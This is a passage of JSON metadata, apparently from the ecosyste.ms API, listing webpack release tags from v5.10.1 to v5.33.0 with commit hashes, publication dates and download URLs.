ha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parse